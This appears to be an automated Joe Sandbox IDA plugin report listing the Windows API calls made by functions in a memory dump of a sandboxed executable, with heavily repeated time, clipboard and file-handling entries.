Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427BB3, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426DEF, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 0043D270: _strncpy.LIBCMT ref: 0043D2B9
Part of subcall function 0043D270: SetVolumeLabelA.KERNEL32(?,?), ref: 0043D303

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427452, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042710A, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 0043F400: GetFileAttributesA.KERNEL32(?), ref: 0043F425
Part of subcall function 0043F400: _strncpy.LIBCMT ref: 0043F4CE
Part of subcall function 0043F400: CreateDirectoryA.KERNEL32(?,00000000), ref: 0043F54C
Part of subcall function 0043F400: GetLastError.KERNEL32 ref: 0043F55B

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426C32, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 0043CC30: GetKeyboardLayout.USER32(00000000), ref: 0043CC44
Part of subcall function 0043CC30: VkKeyScanExA.USER32(?,00000000), ref: 0043CC70

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426DBF, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 0043CE10: _strncpy.LIBCMT ref: 0043CE47
Part of subcall function 0043CE10: GetModuleHandleA.KERNEL32(kernel32,GetDiskFreeSpaceExA), ref: 0043CEA3
Part of subcall function 0043CE10: GetProcAddress.KERNEL32(00000000), ref: 0043CEAA
Part of subcall function 0043CE10: GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0043CF23

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426FA3, Relevance: 9.2, APIs: 6, Instructions: 165time

APIs

Part of subcall function 00451760: LoadLibraryA.KERNEL32(shell32), ref: 00451766
Part of subcall function 00451760: GetProcAddress.KERNEL32(00000000,SHEmptyRecycleBinA,?,00426FAF), ref: 00451778
Part of subcall function 00451760: FreeLibrary.KERNEL32(00000000,?,00426FAF), ref: 00451797
Part of subcall function 00451760: FreeLibrary.KERNEL32(00000000,?,00000007,?,00426FAF), ref: 004517E0

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426F90, Relevance: 9.2, APIs: 6, Instructions: 165time

APIs

Part of subcall function 00451660: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 00451689
Part of subcall function 00451660: SHFileOperation.SHELL32(?), ref: 004516F7

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426F5D, Relevance: 9.2, APIs: 6, Instructions: 165time

APIs

Part of subcall function 0043F5C0: CreateFileA.KERNEL32(004987E9,80000000,00000003,00000000,00000003,08000000,00000000), ref: 0043F795
Part of subcall function 0043F5C0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00426F69), ref: 0043F7A2
Part of subcall function 0043F5C0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00426F69), ref: 0043F7EF
Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F7FF
Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F85E
Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F8F9
Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F937
Part of subcall function 0043F5C0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043F965
Part of subcall function 0043F5C0: GetLastError.KERNEL32 ref: 0043F971
Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F981
Part of subcall function 0043F5C0: GetACP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00426F69), ref: 0043FA2C

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426196, Relevance: 9.2, APIs: 6, Instructions: 164time

APIs

Part of subcall function 00432D80: GetKeyboardLayout.USER32(00000000), ref: 00432E2B
Part of subcall function 00432D80: _strncpy.LIBCMT ref: 00433022
Part of subcall function 00432D80: GetTickCount.KERNEL32 ref: 00433055
Part of subcall function 00432D80: CountClipboardFormats.USER32 ref: 00433254
Part of subcall function 00432D80: IsClipboardFormatAvailable.USER32(00000001), ref: 0043326F
Part of subcall function 00432D80: IsClipboardFormatAvailable.USER32(0000000F), ref: 0043327B
Part of subcall function 00432D80: GetExitCodeProcess.KERNEL32(00000000,?), ref: 004332FA
